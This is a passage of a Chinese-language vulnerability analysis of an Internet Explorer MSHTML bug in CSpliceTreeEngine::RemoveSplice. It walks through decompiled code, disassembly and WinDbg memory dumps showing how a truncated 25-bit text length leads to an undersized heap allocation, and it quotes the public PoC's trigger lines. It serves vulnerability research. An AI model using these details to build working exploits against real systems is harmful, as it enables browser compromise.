void __fastcall Tree::TextData::Create(constwchar_t *SourceTextPtr, ULONG SourceTextCch, constwchar_t *AdditionalTextPtr, ULONG AdditionalTextCch, Tree::TextData **ppTextData){ Tree::TextData::AllocateMemory(SourceTextCch + AdditionalTextCch, ppTextData); if ( *ppTextData ) { _memcpy_s((*ppTextData)->_TextData, 2 * SourceTextCch, SourceTextPtr, 2 * SourceTextCch); if ( AdditionalTextPtr ) _memcpy_s( &(*ppTextData)->_TextData[SourceTextCch], 2 * AdditionalTextCch, AdditionalTextPtr, 2 * AdditionalTextCch); }}
Tree::TextData::GetText()函数用于从Tree::TextData对象获取到文本字符串的指针和长度。
wchar_t *__thiscall Tree::TextData::GetText(Tree::TextData *this, ULONG skip_cch, ULONG *GetedCch){ if ( GetedCch ) *GetedCch = this->_cch - skip_cch; return &this->_TextData[skip_cch];}
CTxtPtr
CTxtPtr继承于CRunPtr<CTxtBlk>。提供对后备存储区中字符数组的访问(即CTxtArray)。
+0x000 CTxtArray* _prgRun, +0x004 LONG _iRun, +0x008 LONG _ich, +0x00C DWORD _cp, +0x010 CMarkup *_pMarkup,
CSpliceTreeEngine::RecordSplice()函数是CSpliceTreeEngine引擎用于记录DOM树的拼接的函数。
HRESULT __thiscall CSpliceTreeEngine::RecordSplice(CSpliceTreeEngine *this){ _this = this; hr1 = 0; pMarkupSource = this->_pMarkupSource; __this = this; if ( *(pMarkupSource + 135) < 90000 || (byte_646F1B3E & 0x10) != 0 ) { v65 = 1; pTxtPtr = MemoryProtection::HeapAlloc<1>(g_hProcessHeap, 0x14u); if ( pTxtPtr ) { tpSourceLCp = CTreePos::GetCpAndMarkup(_this->_ptpSourceL, 0, 0); _pMarkupSource = _this->_pMarkupSource; pTxtPtr->_pMarkup = _pMarkupSource; pTxtPtr->_iRun = 0; pTxtPtr->_ich = 0; pTxtPtr->_cp = 0; pTxtPtr->_prgRun = (_pMarkupSource + 112); pTxtPtr->_cp = CTxtPtr::BindToCp(pTxtPtr, tpSourceLCp); } else { pTxtPtr = 0; } pMarkupSource = _this->_pMarkupSource; } ...}
漏洞PoC所对应的DOM树
这里调试时用的PoC是Google Project Zero的Ivan Fratric提供的PoC,未经修改。
重新调试,附加IE进程,在初始断点断下后,设置以下两个断点。
;bp MSHTML!CSpliceTreeEngine::RemoveSplice,CSpliceTreeEngine::RemoveSplice()函数起始地址 .text:63A46320 ; HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this) .text:63A46320 ?RemoveSplice@CSpliceTreeEngine@@QAEJXZ proc near .text:63A46320 mov edi, edi .text:63A46322 push ebp .text:63A46323 mov ebp, esp .text:63A46325 and esp, 0FFFFFFF8h .text:63A46328 sub esp, 240h .text:63A4632E mov eax, ___security_cookie .text:63A46333 xor eax, esp .text:63A46335 mov [esp+240h+var_4], eax;bp 63A46783,Crash附近第一次调用CTreePos::GetCp() .text:63A46783 mov ecx, [esi+14h] ; this .text:63A46786 call ?GetCp@CTreePos@@QAEJXZ ; CTreePos::GetCp(void) .text:63A4678B mov ecx, [esi+18h] ; this .text:63A4678E mov edi, 1 .text:63A46793 sub edi, eax .text:63A46795 call ?GetCp@CTreePos@@QAEJXZ ; CTreePos::GetCp(void) .text:63A4679A mov ecx, [esi+18h] ; this .text:63A4679D lea edx, [edi+eax]
以下内容是WinDbg调试输出的结果:
(1940.12fc): Break instruction exception - code 80000003 (first chance)ntdll!DbgBreakPoint:00007ffd`64a43150 cc int3 ;初始断点0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice0:020> bp 63A467830:020> gModLoad: 00000000`73e1000000000000`73e9e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.864_none_58922fed78a9e6a7\COMCTL32.dllModLoad: 00000000`6f840000 00000000`6fa30000 C:\Windows\SysWOW64\uiautomationcore.dllModLoad: 00000000`7002000000000000`70066000 C:\Windows\SysWOW64\Bcp47Langs.dllModLoad: 00000000`72e1000000000000`72e2f000 C:\Windows\SysWOW64\WLDP.DLLModLoad: 00000000`771f0000 00000000`77235000 C:\Windows\SysWOW64\WINTRUST.dllBreakpoint 0 hitMSHTML!CSpliceTreeEngine::RemoveSplice:63a46320 8bff mov edi,edi ;第一次中断,b.innerHTML = Array(40370176).toString();0:007:x86> gBreakpoint 0 hitMSHTML!CSpliceTreeEngine::RemoveSplice:63a46320 8bff mov edi,edi ;第二次中断,b.innerHTML = "";0:007:x86> gMSHTML!CSpliceTreeEngine::RemoveSplice+0x463:63a46783 8b4e14 mov ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac0:007:x86> reax=00000000 ebx=04f3cb38 ecx=04890a80 edx=00000000 esi=04f3ca08 edi=048a05aceip=63a46783 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:63a46783 8b4e14 mov ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac ;ecx = 0x048a05ac,CTreePos *_ptpSourceL,<head>0:007:x86> preax=00000000 ebx=04f3cb38 ecx=048a05ac edx=00000000 esi=04f3ca08 edi=048a05aceip=63a46786 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:63a46786 e8dc118900 call MSHTML!CTreePos::GetCp (642d7967) ;eax = 0x00000002,<head>在DOM流中的位置0:007:x86> preax=00000002 ebx=04f3cb38 ecx=00000000 edx=0483d534 esi=04f3ca08 edi=048a05aceip=63a4678b esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:63a4678b 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624 ;ecx = 0x048a0624,CTreePos *_ptpSourceR,</body>0:007:x86> preax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=048a05aceip=63a4678e esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:63a4678e bf01000000 mov edi,10:007:x86> preax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=00000001eip=63a46793 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:63a46793 2bf8 sub edi,eax0:007:x86> preax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=ffffffffeip=63a46795 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei ng nz ac pe cycs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000297MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:63a46795 e8cd118900 call MSHTML!CTreePos::GetCp (642d7967) ;eax = 0x00680004,</body>在DOM流中的位置0:007:x86> preax=00680004 ebx=04f3cb38 ecx=00000000 edx=048a0624 esi=04f3ca08 edi=ffffffffeip=63a4679a esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:63a4679a 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624 ;0:007:x86> preax=00680004 ebx=04f3cb38 ecx=048a0624 edx=048a0624 esi=04f3ca08 edi=ffffffffeip=63a4679d esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:63a4679d 8d1407 lea edx,[edi+eax] ;edx = edi+eax = 0x1-0x2+0x00680004 = 0x006800030:007:x86> preax=00680004 ebx=04f3cb38 ecx=048a0624 edx=00680003 esi=04f3ca08 edi=ffffffffeip=63a467a0 esp=04f3c7a8 ebp=04f3c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x480:63a467a0 f60104 test byte ptr [ecx],4 ds:002b:048a0624=72
我们通过漏洞Crash附近两次调用CTreePos::GetCp()时,传入的参数_ptpSourceL和_ptpSourceR,再结合CTreePos中的_pLeft和_pRight,形成的DOM流双链表结构,以及CTreeNode中_tpBegin和_tpEnd相对于CTreeNode对象起始地址的偏移关系,可以获取到DOM流中所有的元素内容。
以下是ROOT标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:
CTreeNodedd 048a0240048a0240 04890a80 00000000 7002005f 00000051048a0250 00000000 00000000 048a05ac 00000000048a0260 048a02ac 00000062 00000000 00000000048a0270 048a02c4 048a02c4 00000000 000100040x5f = 95,ETAG_ROOT = 95<ROOT>CTreePos * = 048a024cdd 048a024c048a024c 00000051 00000000 00000000 048a05ac048a025c 00000000 048a02ac_cElemLeftAndFlags = 00000051 ElemLeft = 0x0 Flags = 0x51 = 0101 0001,NodeBeg=0x1,TPF_LEFT_CHILD=0x10,TPF_EDGE=0x40_cchLeft = 00000000_pFirstChild = 00000000_pNext = 048a05ac,<head>_pLeft = 00000000_pRight = 048a02ac,<html></ROOT>CTreePos * = 048a0264dd 048a0264048a0264 00000062 00000000 00000000 048a02c4048a0274 048a02c4 00000000_cElemLeftAndFlags = 00000062 ElemLeft = 0x0 Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40_cchLeft = 00000000_pFirstChild = 00000000_pNext = 048a02c4,</html>_pLeft = 048a02c4,</html>_pRight = 00000000
以下是html标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:
CTreeNodedd 048a02a0048a02a0 04890a40 048a0240 7022003a 00000271048a02b0 00000001 048a024c 0483d534 048a024c048a02c0 04896c00 00000262 00680002 04896c60048a02d0 048a05ac 04896c60 048a0264 000300050x3a = 58,ETAG_HTML = 58<html>CTreePos * = 048a02acdd 048a02ac048a02ac 00000271 00000001 048a024c 0483d534048a02bc 048a024c 04896c00_cElemLeftAndFlags = 00000271 ElemLeft = 0x2 Flags = 0x71 = 0111 0001,NodeBeg=0x1,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40_cchLeft = 00000001_pFirstChild = 048a024c,<ROOT>_pNext = 0483d534,_pLeft = 048a024c,<ROOT>_pRight = 04896c00,Pointer</html>CTreePos * = 048a02c4dd 048a02c4048a02c4 00000262 00680002 04896c60 048a05ac048a02d4 04896c60 048a0264_cElemLeftAndFlags = 00000262 ElemLeft = 0x2 Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40_cchLeft = 00680002_pFirstChild = 04896c60,Pointer_pNext = 048a05ac,<head>_pLeft = 04896c60,Pointer_pRight = 048a0264,</ROOT>
以下是head标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:
CTreeNodedd 048a05a0048a05a0 04890b80 048a02a0 70020036 00000061048a05b0 00000000 04896c30 048a02ac 04896c30048a05c0 048a05c4 00000052 00000000 048a060c048a05d0 048a0624 048a05ac 048a060c ffffffff0x36 = 54,ETAG_HEAD = 54<head>CTreePos *_ptpSourceL = 048a05acdd 048a05ac048a05ac 00000061 00000000 04896c30 048a02ac048a05bc 04896c30 048a05c4_cElemLeftAndFlags = 00000061 ElemLeft = 0x0 Flags = 0x61 = 0110 0001,NodeBeg=0x1,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40_cchLeft = 00000000_pFirstChild = 04896c30,Pointer_pNext = 048a02ac,<html>_pLeft = 04896c30,Pointer_pRight = 048a05c4,</head></head>CTreePos * = 048a05c4dd 048a05c4048a05c4 00000052 00000000 048a060c 048a0624048a05d4 048a05ac 048a060c_cElemLeftAndFlags = 00000052 ElemLeft = 0x0 Flags = 0x52 = 0101 0010,NodeEnd=0x2,TPF_LEFT_CHILD=0x10,TPF_EDGE=0x40_cchLeft = 00000000_pFirstChild = 048a060c,<body>_pNext = 048a0624,</body>_pLeft = 048a05ac,<head>_pRight = 048a060c,<body>
以下是body标签的CTreeNode、起始标签和结束标签对应的CTreePos的对象内存数据:
CTreeNodedd 048a0600048a0600 0489a3c0 048a02a0 70020012 00000061048a0610 00000000 00000000 048a05c4 048a05c4048a0620 04896ae0 00000062 00000000 00000000048a0630 04896ae0 04896ae0 04896bd0 ffffffff0x12 = 18,ETAG_BODY = 18<body>CTreePos * = 048a060cdd 048a060c048a060c 00000061 00000000 00000000 048a05c4048a061c 048a05c4 04896ae0_cElemLeftAndFlags = 00000061 ElemLeft = 0x0 Flags = 0x61 = 0110 0001,NodeBeg=0x1,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40_cchLeft = 00000000_pFirstChild = 00000000_pNext = 048a05c4,</head>_pLeft = 048a05c4,</head>_pRight = 04896ae0,Text</body>CTreePos *_ptpSourceR = 048a0624dd 048a0624048a0624 00000062 00000000 00000000 04896ae0048a0634 04896ae0 04896bd0_cElemLeftAndFlags = 00000062 ElemLeft = 0x0 Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40_cchLeft = 00000000_pFirstChild = 00000000_pNext = 04896ae0,Text_pLeft = 04896ae0,Text_pRight = 04896bd0,Pointer
以下是DOM流中除了标签结点以外,链入的CTreeDataPos(Text)和CTreeDataPos(Pointer)对象的内存数据:
PointerCTreeDataPos * = 04896c30dd 04896c3004896c30 00000098 00000000 04896c00 048a02c404896c40 04896c00 048a05ac 00000080 0000000004896c50 00000000 00000000 00000000_cElemLeftAndFlags = 00000098 ElemLeft = 0x0 Flags = 0x98 = 1001 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_DATA_POS=0x80_cchLeft = 00000000_pFirstChild = 04896c00,Pointer_pNext = 048a02c4,</html>_pLeft = 04896c00,Pointer_pRight = 048a05ac,<head>_ulRefs_Flags = 00000080pSmartObject = 00000000_pTextData = 00000000_dwPointerAndGravityAndCling = 00000000---------------------------------------------------------------------------------------------------------------PointerCTreeDataPos * = 04896c60dd 04896c6004896c60 00000298 00680002 04896bd0 048a026404896c70 04896bd0 048a02c4 00000080 0000000004896c80 00000000 00000001 00000000_cElemLeftAndFlags = 00000298 ElemLeft = 0x2 Flags = 0x98 = 1001 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_DATA_POS=0x80_cchLeft = 00680002_pFirstChild = 04896bd0,Pointer_pNext = 048a0264,</ROOT>_pLeft = 04896bd0,Pointer_pRight = 048a02c4,</html>_ulRefs_Flags = 00000080pSmartObject = 00000000_pTextData = 00000000_dwPointerAndGravityAndCling = 00000001---------------------------------------------------------------------------------------------------------------TextCTreeDataPos * = 04896ae0dd 04896ae004896ae0 000002f4 00000002 048a05c4 04896bd004896af0 048a060c 048a0624 00000041 0000000004896b00 1cf14020 8267ffff 00000000_cElemLeftAndFlags = 000002f4 ElemLeft = 0x2 Flags = 0xf4 = 1111 0100,Text=0x4,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA2_POS=0x40,TPF_DATA_POS=0x80_cchLeft = 00000002_pFirstChild = 048a05c4,</head>_pNext = 04896bd0,Pointer_pLeft = 048a060c,<body>_pRight = 048a0624,</body>_ulRefs_Flags = 00000041pSmartObject = 00000000_pTextData = 1cf14020,Tree::TextData_sid_cch = 8267ffff _cch = 0x8267ffff & 0x1ffffff = 0x67ffff _sid = 0x8267ffff >> 25 = 0x41 = 0100 0001_lTextID = 00000000!heap -x 1cf14020Entry User Heap Segment Size PrevSize Unused Flags-----------------------------------------------------------------------------000000001cf14018 000000001cf14020 0000000000730000 0000000000730000 4d01000 0 ffa busy extra virtualdd 1cf140201cf14020 00000002 0267ffff 002c002c 002c002c1cf14030 002c002c 002c002c 002c002c 002c002c1cf14040 002c002c 002c002c 002c002c 002c002c1cf14050 002c002c 002c002c 002c002c 002c002c1cf14060 002c002c 002c002c 002c002c 002c002c1cf14070 002c002c 002c002c 002c002c 002c002c1cf14080 002c002c 002c002c 002c002c 002c002c1cf14090 002c002c 002c002c 002c002c 002c002c...dd 1cf14020+0x2680000*2-0x1021c14010 002c002c 002c002c 002c002c 002c002c21c14020 002c002c 0000002c 00000000 00000000_ulRefs = 0x2_cch = 0x0267ffff = 40370175_TextData = 2c 00 2c 00 ...0x21c14026 - 0x1cf14028 = 0x4CFFFFE0x4CFFFFE/2 = 0x267FFFF = 40370175---------------------------------------------------------------------------------------------------------------PointerCTreeDataPos * = 04896c00dd 04896c0004896c00 000000b8 00000000 00000000 04896c3004896c10 048a02ac 04896c30 00000040 0000000004896c20 00000000 04f3ce28 00000000_cElemLeftAndFlags = 000000b8 ElemLeft = 0x0 Flags = 0xb8 = 1011 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA_POS=0x80_cchLeft = 00000000_pFirstChild = 00000000_pNext = 04896c30,Pointer_pLeft = 048a02ac,<html>_pRight = 04896c30,Pointer_ulRefs_Flags = 00000040pSmartObject = 00000000_pTextData = 00000000_dwPointerAndGravityAndCling = 04f3ce28---------------------------------------------------------------------------------------------------------------PointerCTreeDataPos * = 04896bd0dd 04896bd004896bd0 000002b8 00680002 04896ae0 04896c6004896be0 048a0624 04896c60 00000040 0000000004896bf0 00000000 04f3ce70 00000000_cElemLeftAndFlags = 000002b8 ElemLeft = 0x2 Flags = 0xb8 = 1011 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA_POS=0x80_cchLeft = 00680002_pFirstChild = 04896ae0,Text_pNext = 04896c60,Pointer_pLeft = 048a0624,</body>_pRight = 04896c60,Pointer_ulRefs_Flags = 00000040pSmartObject = 00000000_pTextData = 00000000_dwPointerAndGravityAndCling = 04f3ce70
我根据CTreePos中的_pFirstChild和_pNext成员,可以还原出此漏洞PoC所对应的DOM树结构如下图所示:
我根据CTreePos中的_pLeft和_pRight成员,可以还原出此漏洞PoC所对应的DOM流结构如下图所示:
漏洞产生的根本原因分析
以下是动态调试过程中,关键部分的WinDbg输出内容:
(638.e60): Break instruction exception - code 80000003 (first chance)ntdll!DbgBreakPoint:00007ffd`64a43150 cc int30:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice0:020> bp 63A46783 ; Crash前调用的第一个CTreePos::GetCp()0:020> bp 63A467B5 ; 分配存储要删除的元素的堆块,operatornew[]()0:020> bp 63A468CF ; 获取文本的未截断长度,Tree::TextData::GetText()0:020> gBreakpoint 0 hitMSHTML!CSpliceTreeEngine::RemoveSplice:63a46320 8bff mov edi,edi ; 第一次中断,b.innerHTML = Array(40370176).toString();0:008:x86> gBreakpoint 0 hitMSHTML!CSpliceTreeEngine::RemoveSplice:63a46320 8bff mov edi,edi ; 第二次中断,b.innerHTML = "";0:008:x86> gBreakpoint 1 hitMSHTML!CSpliceTreeEngine::RemoveSplice+0x463:63a46783 8b4e14 mov ecx,dword ptr [esi+14h] ds:002b:0508ca1c=04aae54c0:008:x86> peax=00000000 ebx=0508cb38 ecx=04aae54c edx=00000000 esi=0508ca08 edi=04aae54ceip=63a46786 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:63a46786 e8dc118900 call MSHTML!CTreePos::GetCp (642d7967) ; 返回值为0x2,<ROOT>和<html>标签对应的字符数0:008:x86> dd ecx-0xc l10 ; CTreeNode,_ptpSourceL(<head>),0x04aae548 = 0x36 = 54,ETAG_HEAD = 5404aae540 04a82d40 04aae240 700200360000006104aae550 0000000004a84b40 04aae24c 04a84b4004aae560 04aae564 000000520000000004aae5ac04aae570 04aae5c4 04aae54c 04aae5ac ffffffff0:008:x86> peax=00000002 ebx=0508cb38 ecx=00000000 edx=04a3d534 esi=0508ca08 edi=04aae54ceip=63a4678b esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:63a4678b 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c40:008:x86> peax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=04aae54ceip=63a4678e esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:63a4678e bf01000000 mov edi,10:008:x86> dd ecx-0x24 l10 ; CTreeNode,_ptpSourceL(</body>),0x04aae5a8 = 0x12 = 18,ETAG_BODY = 1804aae5a0 04a86320 04aae240 700200120000006104aae5b0 000000000000000004aae564 04aae56404aae5c0 04a849f0 00000062000000000000000004aae5d0 04a849f0 04a849f0 04a84ae0 ffffffff0:008:x86> peax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=00000001eip=63a46793 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:63a46793 2bf8 sub edi,eax ; 1-2=-10:008:x86> peax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=ffffffffeip=63a46795 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei ng nz ac pe cycs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000297MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:63a46795 e8cd118900 call MSHTML!CTreePos::GetCp (642d7967) ; 返回值为0x00680004; Array(40370176),40370176-1 = 0x267ffff; CTreeDataPos->DATAPOSTEXT->_cch(25bit),0x67ffff; 0x00680004 = 0x67ffff + 0x5; <ROOT>,<html>,<head>,</head>,<body>标签的字符数每个为10:008:x86> peax=00680004 ebx=0508cb38 ecx=00000000 edx=04aae5c4 esi=0508ca08 edi=ffffffffeip=63a4679a esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:63a4679a 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c40:008:x86> peax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=04aae5c4 esi=0508ca08 edi=ffffffffeip=63a4679d esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:63a4679d 8d1407 lea edx,[edi+eax] ; edx = 0x00680003; _ptpSourceL(<head>),_ptpSourceL(</body>); CTreeDataPos->DATAPOSTEXT->_cch(25bit),0x67ffff; 0x00680003 = 0x67ffff + 0x4; <head>,</head>,<body>,</body>标签的字符数每个为1......0:008:x86> gBreakpoint 2 hitMSHTML!CSpliceTreeEngine::RemoveSplice+0x495:63a467b5 8b442458 mov eax,dword ptr [esp+58h] ss:002b:0508c800=006800040:008:x86> pMSHTML!CSpliceTreeEngine::RemoveSplice+0x499:63a467b9 3b442460 cmp eax,dword ptr [esp+60h] ss:002b:0508c808=006800040:008:x86> pMSHTML!CSpliceTreeEngine::RemoveSplice+0x49d:63a467bd 0f8f36ac1400 jg MSHTML!CSpliceTreeEngine::RemoveSplice+0x14b0d9 (63b913f9) [br=0]0:008:x86> peax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=00680003 esi=0508ca08 edi=ffffffffeip=63a467c3 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a3:63a467c3 8d0c12 lea ecx,[edx+edx]0:008:x86> peax=00680004 ebx=0508cb38 ecx=00d00006 edx=00680003 esi=0508ca08 edi=ffffffffeip=63a467c6 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a6:63a467c6 e8c3fa1e00 call MSHTML!ProcessHeapAlloc<0> (63c3628e) ; 分配的堆块是以文本截断长度进行分配的0:008:x86> peax=21d4e020 ebx=0508cb38 ecx=00d00006 edx=00000000 esi=0508ca08 edi=ffffffffeip=63a467cb esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246MSHTML!CSpliceTreeEngine::RemoveSplice+0x4ab:63a467cb 89465c mov dword ptr [esi+5Ch],eax ds:002b:0508ca64=000000000:008:x86> !heap -x eaxEntry User Heap Segment Size PrevSize Unused Flags-----------------------------------------------------------------------------0000000021d4e018 0000000021d4e020 00000000006700000000000000670000 d01000 0 ffa busy extra virtual0:008:x86> gBreakpoint 3 hiteax=000002e4 ebx=0508cb38 ecx=04a849f0 edx=00000003 esi=0508ca08 edi=0000fdefeip=63a468cf esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5af:63a468cf 8b4920 mov ecx,dword ptr [ecx+20h] ds:002b:04a84a10=1d02f0200:008:x86> dd ecx lc ; CTreeDataPos(Text)04a849f0 000002e40000000204aae564 04aae54c04a84a00 04aae5ac 04aae5c4 000000410000000004a84a10 1d02f020 8267ffff 00000000000000000:008:x86> !heap -x 1d02f020Entry User Heap Segment Size PrevSize Unused Flags-----------------------------------------------------------------------------000000001d02f018 000000001d02f020 000000000067000000000000006700004d01000 0 ffa busy extra virtual0:008:x86> dd 1d02f020 l10 ; Tree::TextData对象1d02f020 000000020267ffff 002c002c 002c002c1d02f030 002c002c 002c002c 002c002c 002c002c1d02f040 002c002c 002c002c 002c002c 002c002c1d02f050 002c002c 002c002c 002c002c 002c002c0:008:x86> dd 1d02f020+0x2680000*2-0x10 l1021d2f010 002c002c 002c002c 002c002c 002c002c21d2f020 002c002c 0000002c 000000000000000021d2f030 0000000000000000000000000000000021d2f040 000000000000000000000000000000000:008:x86> peax=000002e4 ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdefeip=63a468d2 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b2:63a468d2 8d442414 lea eax,[esp+14h]0:008:x86> peax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdefeip=63a468d6 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b6:63a468d6 50 push eax ; 存储实际获得的文本长度的局部变量0:008:x86> peax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdefeip=63a468d7 esp=0508c7a4 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b7:63a468d7 6a00 push 0 ; skip_cch,需要跳过的字符数0:008:x86> peax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdefeip=63a468d9 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b9:63a468d9 e890b1fbff call MSHTML!Tree::TextData::GetText (63a01a6e) 0:008:x86> peax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0000fdefeip=63a468de esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nccs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202MSHTML!CSpliceTreeEngine::RemoveSplice+0x5be:63a468de 8b7c2414 mov edi,dword ptr [esp+14h] ss:002b:0508c7bc=0267ffff0:008:x86> dd eax-0x8 l10 ; 返回值为文本字符串的指针,Tree::TextData对象偏移8字节处1d02f020 000000020267ffff 002c002c 002c002c1d02f030 002c002c 002c002c 002c002c 002c002c1d02f040 002c002c 002c002c 002c002c 002c002c1d02f050 002c002c 002c002c 002c002c 002c002c0:008:x86> dd 0508c7bc l10508c7bc 0267ffff ; 实际获得的文本长度,未截断文本长度,0x0267ffff = 40370176 - 10:008:x86> peax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0267ffffeip=63a468e2 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei 